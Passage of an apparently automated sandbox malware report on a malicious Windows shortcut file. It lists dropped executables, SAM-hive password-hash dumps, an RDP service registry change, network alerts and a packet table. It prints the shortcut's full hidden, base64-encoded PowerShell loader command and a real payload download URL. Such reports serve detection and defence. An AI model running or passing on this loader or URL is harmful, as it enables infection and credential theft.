C:\Windows\Temp\docsz

Download File

Process:	C:\Windows\Temp\myRdpService.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	271
Entropy (8bit):	4.959233174821663
Encrypted:	false
SSDEEP:	6:IwRJBYzRJBYlr8SJBY4U4GVjWIUE5dMnpqX:I8sRs8SD8jW3EvMpo
MD5:	09B25CAC0BFA90484337CCC8EF9DCD60
SHA1:	1BBF4858E3266F1E6B89B8A0A3D567CB2A30FA4A
SHA-256:	53DCA461E84E00AF9900DC80A07421B8BCF309D5A046A6317166315ED6FD1C49
SHA-512:	A5B08D0A86DFDE44A20C7454532705B24E9A065F43A9CC3F0B67841673B769CBF969A82BF464935B5AB3D8550D25FE17FBA56A259D06757F1783A52FCE090B65
Malicious:	false
Preview:	Administrator\|31d6cfe0d16ae931b73c59d7e0c089c0..Guest\|31d6cfe0d16ae931b73c59d7e0c089c0..DefaultAccount\|31d6cfe0d16ae931b73c59d7e0c089c0..WDAGUtilityAccount\|21A354058DFF20F7943C42B0FDF94216..user\|32ED87BDB5FDC5E9CBA88547376818D4..User1\|9D40E39ADEB5D56955BED3470DA6D02C..

C:\Windows\Temp\dp

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.7179360295889174
Encrypted:	false
SSDEEP:	3:QnlVldGlVlil:QdUu
MD5:	A6850FB0659A548ACF3B99814BF23C93
SHA1:	690D23F93EEA833EB4D5B8D20F3938E25E64BB72
SHA-256:	38961B38E6AFD73A897F43E7513755EAE09B9605AB97E698F2201665F4CF96DB
SHA-512:	DD61B6C972655AEFD3BFA5BA493476644071354EA482F224FEB2F5BC0992B6DC59CB7918F0F41139B0D4E73848850A8070DB82BB0DC4915999E33CCA22FAA37E
Malicious:	false
Preview:	..1.9.2.0.x.1.0.8.0.....

C:\Windows\Temp\file

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	8357376
Entropy (8bit):	6.871261170959167
Encrypted:	false
SSDEEP:	98304:QItEWBowFOHzb0sg6jsDNg4WNbpsDFnoDhno/S1w8s/I:QItDBowFOTbk6mNWNbpYtej1w8s/I
MD5:	E6C9E4ABDC9BACE6F54B1ED41622F54F
SHA1:	7FD64CA2D9718F31F05692279F428CB7B8EFF8C6
SHA-256:	2D285378BB1F24AA547EDB806FA18137127882F46EA1A3FA466F2645520233F1
SHA-512:	F1245224972CE79505D184DDE00A94B33D5FD12500A84C31A620BD208DA5913DD09AEC131F9C6A0E4F295F0F04FF9284667408DE209C3B552F25527FC90837FB
Malicious:	false
Preview:	L[......................A............................................... ..M. Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/...%.........v...................._...............Z.......Z...............Z.......[.......[......Shbi............QD..e.....Yf..........#....(..F..Q8...............A..........................................a..........................................A..Y...YA..U....a.......................q..................................)...q...A............!^............................./udyu...y&.......)..................!..a/l`o`fde..:..A....:..-..............!..aixes`udey.....I........................./se`u`..MF3..!^..I3...F.............A..A/e`u`........q...o...1{.............A.../qe`u`................{.............A..A/srsb........a.......o~.............A..A/sdmnb.......q.......u~.............A..C........................................................................................................................................................................................

C:\Windows\Temp\log_rdp_11122024_06.txt

Download File

Process:	C:\Windows\Temp\myRdpService.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	872
Entropy (8bit):	5.284645208984015
Encrypted:	false
SSDEEP:	12:E6s2g+soCF9EmMhPCH/aNq6BNBR6+8S61q8jWQ1xrGwpavkEKm:E6sz9oCFXnfS/DB8+a1gWxSwD4
MD5:	CBAB8FD07F531251BB26937D38D9BA76
SHA1:	DAEF53DB03AEC68F245EE61F535B363009C8CCC9
SHA-256:	6425BCF96F9A2F5DF706229E3862E7B0A1257083E63F52A4D4E2D7C0B906916D
SHA-512:	26779298E808EDD53734B146BC94C8BE3E2FF9FA7BA6B89E0056A4DA8BC8E6C2FD6A99DB6C5CE1A50FFBF663963BA869C96B76920C9FA38E4FFFAE2952603686
Malicious:	false
Preview:	18:30:24 - Internet connection..18:30:24 - Begin check server..18:30:30 - Begin connect..18:30:35 - BootKey: D6-AA-4D-99-DC-41-86-C3-63-A1-2C-89-7F-F8-5B-85..18:30:35 - Successfully accessed SAM hive...18:30:35 - Reading usernames and encrypted hashes.....18:30:35 - Administrator..18:30:35 - Guest..18:30:35 - DefaultAccount..18:30:35 - WDAGUtilityAccount..18:30:35 - user..18:30:35 - User1..18:30:35 - SAM_Resolution_1920x1080..18:30:36 - SAM_USER_Administrator\|31d6cfe0d16ae931b73c59d7e0c089c0..18:30:36 - SAM_USER_Guest\|31d6cfe0d16ae931b73c59d7e0c089c0..18:30:37 - SAM_USER_DefaultAccount\|31d6cfe0d16ae931b73c59d7e0c089c0..18:30:38 - SAM_USER_WDAGUtilityAccount\|21A354058DFF20F7943C42B0FDF94216..18:30:38 - SAM_USER_user\|32ED87BDB5FDC5E9CBA88547376818D4..18:30:39 - SAM_USER_User1\|9D40E39ADEB5D56955BED3470DA6D02C..18:30:56 - detect message PING..18:30:56 - PING..

C:\Windows\Temp\myRdpService.exe

Download File

Process:	C:\Windows\Temp\svczHost.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	9429504
Entropy (8bit):	6.889775220697302
Encrypted:	false
SSDEEP:	98304:mfhsbOItDNUaBVthhcT/Fe5Yqa5z1bRT6G0EYd+Tj:HbO8N9BH4ToYqopbRT6GLpj
MD5:	5641F3A5B9787F23D3D34F0D9F791B7A
SHA1:	021867C55B5724C28981F58A9A38DBE298057793
SHA-256:	5744321DFC2240023EF89A8D3A4B57C635FEDFEF0E265F1C8F7971AA9F635C34
SHA-512:	3E96E1675C96A0CEAD3E7294128CB742D7813F65AB55F907D0F447B966BCD086FB533D25D710E9F9CC5C1781D1819C2F2C86DEBBD94A6A901C9A49AB30430E7B
Malicious:	true
Joe Sandbox View:	Filename: rRtGI3L0ca.lnk, Detection: malicious, Browse Filename: L0jeOoavu4.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6 ..Xs..Xs..Xs...s..Xs..Yr..Xs..Ys,.Xs..[r..Xs..\r..Xs..]r..Xs..\r..Xs..Xs..Xs..]r.Xs..Xr..Xs..Zr..XsRich..Xs................PE..d.....Xg.........."....).>P...A................@.............................@............`...................................................\|............................ ..L...............................(...P...@.............l..............................text....G.......H.................. ..`.managedX.C..`....C..L.............. ..`hydrated`....`P..........................rdata..`t9...l..v9..BP.............@..@.data....x..........................@....pdata...............>..............@..@.rsrc..............................@..@.reloc..L.... .....................@..B................................................................................................................................................................

C:\Windows\Temp\regBackup.reg

Download File

Process:	C:\Windows\regedit.exe
File Type:	Windows Registry little-endian text (Win2K or above)
Category:	dropped
Size (bytes):	5492
Entropy (8bit):	3.2564408602149646
Encrypted:	false
SSDEEP:	96:0PVJqMXWMRUYSFd5YtU6W66zpVwkP9Odgd8zkFJdlzOkJdB0u1Jd8ui4c4d8zB/H:sVJqgUZ/5+g7P94RgFx9R43Zy1TbZH56
MD5:	A766DECEF71813234AAF41DB4EF5086E
SHA1:	564473B1CB74ED13E820C62F30642836B8D983C6
SHA-256:	8CA780CD4F6488CBBB1B6999D935B4F8352B36B3E2E1E54301875C6483A87535
SHA-512:	C3CF7BADAD40C63C0479DD7A50762968038A9D402E8AE34697F30D09E206D5D090270013504B801EECB82D234280535E21629A6F23F1F04CE1CF2D3EF0C37051
Malicious:	true
Preview:	..W.i.n.d.o.w.s. .R.e.g.i.s.t.r.y. .E.d.i.t.o.r. .V.e.r.s.i.o.n. .5...0.0.........[.H.K.E.Y._.L.O.C.A.L._.M.A.C.H.I.N.E.\.S.Y.S.T.E.M.\.C.u.r.r.e.n.t.C.o.n.t.r.o.l.S.e.t.\.S.e.r.v.i.c.e.s.\.T.e.r.m.S.e.r.v.i.c.e.].....".D.e.p.e.n.d.O.n.S.e.r.v.i.c.e.".=.h.e.x.(.7.).:.5.2.,.0.0.,.5.0.,.0.0.,.4.3.,.0.0.,.5.3.,.0.0.,.5.3.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.....".D.e.s.c.r.i.p.t.i.o.n.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.7.".....".D.i.s.p.l.a.y.N.a.m.e.".=.".@.%.S.y.s.t.e.m.R.o.o.t.%.\.\.S.y.s.t.e.m.3.2.\.\.t.e.r.m.s.r.v...d.l.l.,.-.2.6.8.".....".E.r.r.o.r.C.o.n.t.r.o.l.".=.d.w.o.r.d.:.0.0.0.0.0.0.0.1.....".F.a.i.l.u.r.e.A.c.t.i.o.n.s.".=.h.e.x.:.8.0.,.5.1.,.0.1.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.3.,.0.0.,.0.0.,.0.0.,.1.4.,.0.0.,.0.0.,.\..... . .0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.1.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.0.0.,.6.0.,.e.a.,.0.0.,.0.0.....".I.m.a.g.e.P.a.t.h.".=.h.e.x.

C:\Windows\Temp\svczHost.exe

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8357376
Entropy (8bit):	6.871261170959167
Encrypted:	false
SSDEEP:	49152:gAolapw+tVy4CZ79cORdCVhYWXnMdI7pz1YoSBrIc7ywciqQMmLdp1sVOFJHluxx:pgacEZyBpu9r/derR2hs/OLYGMIU9+
MD5:	9298A0077E8353244A38CAEFE43AF4CB
SHA1:	155D0C93E1BA7DD7B22228BEC1A030FAE0678398
SHA-256:	B1D69CBC0A2D13B89500D37726AD9E01817C8890262E3CE4A561F82B63708B9A
SHA-512:	34CD8853EEBD3E54393726DF668D5F620EE6AC0FD5967F91A26B2E5F4186CB403A2197D9DE497CB93B3498EBC0E2DF098D122376E0276A15F1D412C7D874D87A
Malicious:	true
Joe Sandbox View:	Filename: rRtGI3L0ca.lnk, Detection: malicious, Browse Filename: L0jeOoavu4.lnk, Detection: malicious, Browse Filename: MdmRznA6gx.lnk, Detection: malicious, Browse Filename: Cj3OWJHzls.lnk, Detection: malicious, Browse Filename: 3y37oMIUy6.lnk, Detection: malicious, Browse Filename: m9c7iq9nzP.lnk, Detection: malicious, Browse Filename: WXahq3ZEss.lnk, Detection: malicious, Browse Filename: rRtGI3L0ca.lnk, Detection: malicious, Browse Filename: L0jeOoavu4.lnk, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w....................^...............[.......[...............[.......Z.......Z......Rich............PE..d.....Xg.........."....)..G..P9...............@..........................................`..........................................@..X...X@..T....`.......................p..................................(...p...@............ _..............................text...x'.......(.................. ..`.managed..;..@....;..,.............. ..`hydratedx.....H..........................rdata..LG2.. _..H2...G.............@..@.data........p...n...0z.............@....pdata................z.............@..@.rsrc........`.......n..............@..@.reloc.......p.......t..............@..B........................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\Temp\svczHost.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	64
Entropy (8bit):	4.498593025747649
Encrypted:	false
SSDEEP:	3:eDLpHWfPdBEyQOKxxTln:eDLp2f0yQdTl
MD5:	AAC5E4A67CCAFB7B9D6A9D922A7A056F
SHA1:	8AF95EE9419B81B3815F4935AB3B82D8CC1C0699
SHA-256:	B8C7519BFC652B8C92BADF18D6ADBFB01D94245E612A9B4BA8C12CF5BA675410
SHA-512:	907908493F4D0FAC9C9DF21FEC5A18E4B5A34FB5C78A4DBD0120435DCAD7FCF104C153F704E80DB3AA30DDE358887BCFE440CE0444A7848F054FD4AD38346344
Malicious:	false
Preview:	Begin download https://cocomethode.de/StaticFile/RdpService/87..

Static File Info

General

File type:	MS Windows shortcut, Has Working directory, Has command line arguments, Icon number=347, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
Entropy (8bit):	8.622665950964063E-4
TrID:	Windows Shortcut (20020/1) 100.00%
File name:	0A3NB8ot11.lnk
File size:	41'943'040 bytes
MD5:	e0e574ffa723e6fa127f24845bd649da
SHA1:	9aae7e9f61a1efda843964a651047855bbfae0ce
SHA256:	2c0d998d2a843533d1627ad62d413a01d3b4d0b86ca2527b1f56a5e42f059409
SHA512:	e28e1a26d08d58b0194104d11fdfd4fbf62d0d0d6a4c358ec9ad4801d2690844941d814986dc148aee1e492b432e44854867a7373fb19db4dab5c628081d12f8
SSDEEP:	96:8iEr8rlMvomw/QlZqIz2lE5hgcZFLWiLIxEpflwOh:8iq8rlMvomTBL7L7fWO
TLSH:	7D97DE0269EB10C9F16747701FD8F8FF477AE4221A2EB6B61100D745CB35BC8CA62AB4
File Content Preview:	L..................F.B..................................[.......................^./.v. ./.k. .".p.O.W.E.R.s.h.e.L.l...e.X.E. .-.W.I.N.D.o.W.S.T.y.l.E. .h.i.D.d.E.N. .-.E.n.c.o.D.E.d.C.o.m.m.A.n.d. .".U.w.B.0.A.G.E.A.c.g.B.0.A.C.0.A.U.A.B.y.A.G.8.A.Y.w.B.l

File Icon


Icon Hash:	69e9a9a9a3a3a1a5

Static Windows Shortcut Info

General
Relative Path:
Command Line Argument:	/v /k "pOWERsheLl.eXE -WINDoWSTylE hiDdEN -EncoDEdCommAnd "UwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAFcAaQBuAGQAbwB3AFMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAiACwAIAAiAC0ATgBvAEwAbwBnAG8AIgAsACAAIgAtAE4AbwBQAHIAbwBmAGkAbABlACIALAAgACIALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACIALAAgACIALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABTAFEAQgBGAEEARgBnAEEASQBBAEEAbwBBAEYAcwBBAFYAQQBCAEYAQQBGAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEUAOABBAFIAQQBCAHAAQQBHADQAQQBSAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEARgBRAEEAVQB3AEIAMABBAEYASQBBAFMAUQBCAE8AQQBHAGMAQQBLAEEAQQBvAEEARQBrAEEAZAB3AEIAeQBBAEMAQQBBAEsAQQBCAGIAQQBGAE0AQQBlAFEAQgB6AEEASABRAEEAWgBRAEIAdABBAEMANABBAFYAQQBCAGwAQQBIAGcAQQBkAEEAQQB1AEEARQBVAEEAYgBnAEIAagBBAEcAOABBAFoAQQBCAHAAQQBHADQAQQBaAHcAQgBkAEEARABvAEEATwBnAEIAVgBBAEYAUQBBAFIAZwBBADQAQQBDADQAQQBSAHcAQgBsAEEASABRAEEAVQB3AEIAMABBAEgASQBBAGEAUQBCAHUAQQBHAGMAQQBLAEEAQgBiAEEARQBNAEEAYgB3AEIAdQBBAEgAWQBBAFoAUQBCAHkAQQBIAFEAQQBYAFEAQQA2AEEARABvAEEAUgBnAEIAeQBBAEcAOABBAGIAUQBCAEMAQQBHAEUAQQBjAHcAQgBsAEEARABZAEEATgBBAEIAVABBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBvAEEAQwBJAEEAWQBRAEIASQBBAEYASQBBAE0AQQBCAGoAQQBFAGcAQQBUAFEAQQAyAEEARQB3AEEAZQBRAEEANQBBAEcAbwBBAFkAZwBBAHkAQQBFADQAQQBkAGcAQgBpAEEARgBjAEEAVgBnAEEAdwBBAEcARQBBAFIAdwBBADUAQQBHAHMAQQBXAGcAQgBUAEEARABVAEEAYQB3AEIAYQBBAEYATQBBAE8AUQBCAFEAQQBGAE0AQQBNAEEAQQAxAEEARwAwAEEASQBnAEEAcABBAEMAawBBAEsAUQBBAHAAQQBDADQAQQBRAHcAQgBQAEEARwA0AEEAVgBBAEIARgBBAEcANABBAGQAQQBBAHAAQQBDAGsAQQAiAA=="" && exit
Icon location:	%SystemRoot%\System32\imageres.dll

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T12:29:01.463885+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.11.20	49738	104.21.1.51	443	TCP
2024-12-11T12:29:03.532490+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.11.20	49740	104.21.1.51	443	TCP
2024-12-11T12:29:05.790170+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.11.20	49742	104.21.1.51	443	TCP
2024-12-11T12:29:28.015703+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.11.20	49755	104.21.1.51	443	TCP
2024-12-11T12:30:13.873811+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.11.20	49761	104.21.1.51	443	TCP
2024-12-11T12:31:07.913778+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.11.20	49766	104.21.1.51	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 12:28:57.852632999 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:57.852652073 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:57.853354931 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:57.862087011 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:57.862095118 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.102080107 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.102257967 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:58.119548082 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:58.119565010 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.120079994 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.127552986 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:58.170253038 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.942778111 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.942847967 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.942893982 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.942943096 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.943039894 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:58.943054914 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:58.943116903 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:58.996396065 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:59.185229063 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:59.185303926 CET	443	49737	104.21.1.51	192.168.11.20
Dec 11, 2024 12:28:59.185460091 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:28:59.193681955 CET	49737	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:00.371900082 CET	49738	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:00.371917963 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:00.372050047 CET	49738	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:00.372318029 CET	49738	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:00.372322083 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:00.606843948 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:00.613377094 CET	49738	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:00.613389969 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.463896036 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.464061975 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.464137077 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.464237928 CET	49738	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.464253902 CET	443	49738	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.464592934 CET	49738	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.476545095 CET	49738	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.588843107 CET	49739	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.588875055 CET	443	49739	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.589052916 CET	49739	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.589196920 CET	49739	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.589215994 CET	443	49739	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.825957060 CET	443	49739	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.827126026 CET	49739	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.827176094 CET	443	49739	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:01.827339888 CET	49739	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:01.827359915 CET	443	49739	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:02.403985977 CET	443	49739	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:02.404047012 CET	443	49739	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:02.404169083 CET	49739	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:02.404479027 CET	49739	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:02.438899040 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:02.438929081 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:02.439091921 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:02.439467907 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:02.439479113 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:02.673768997 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:02.674798012 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:02.674813986 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.532463074 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.532654047 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.532777071 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.532877922 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.532952070 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.533073902 CET	443	49740	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.533277035 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.533277035 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.543484926 CET	49740	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.563618898 CET	49741	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.563697100 CET	443	49741	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.563910961 CET	49741	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.564095020 CET	49741	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.564157009 CET	443	49741	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.807159901 CET	443	49741	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.808482885 CET	49741	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.808546066 CET	443	49741	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:03.808722973 CET	49741	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:03.808756113 CET	443	49741	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:04.647063017 CET	443	49741	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:04.647159100 CET	443	49741	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:04.647337914 CET	49741	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:04.647562981 CET	49741	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:04.663172960 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:04.663203955 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:04.663392067 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:04.663651943 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:04.663665056 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:04.898188114 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:04.899530888 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:04.899545908 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:05.790195942 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:05.790386915 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:05.790474892 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:05.790554047 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:05.790581942 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:05.790612936 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:05.790627956 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:05.790900946 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.032790899 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.033065081 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.033265114 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.033276081 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.033375978 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.033391953 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.033667088 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.033674002 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.033880949 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.033885956 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.033907890 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.034109116 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.034111977 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.088468075 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.285222054 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.285703897 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.285733938 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.285814047 CET	443	49742	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.285868883 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.286051989 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.296051025 CET	49742	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.951389074 CET	49743	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.951411009 CET	443	49743	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:06.951615095 CET	49743	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.951733112 CET	49743	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:06.951740026 CET	443	49743	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:07.185558081 CET	443	49743	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:07.186503887 CET	49743	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:07.186511993 CET	443	49743	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:07.186655045 CET	49743	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:07.186661005 CET	443	49743	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:07.766637087 CET	443	49743	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:07.766680956 CET	443	49743	104.21.1.51	192.168.11.20
Dec 11, 2024 12:29:07.766931057 CET	49743	443	192.168.11.20	104.21.1.51
Dec 11, 2024 12:29:07.767117977 CET	49743	443	192.168.11.20	104.21.1.51
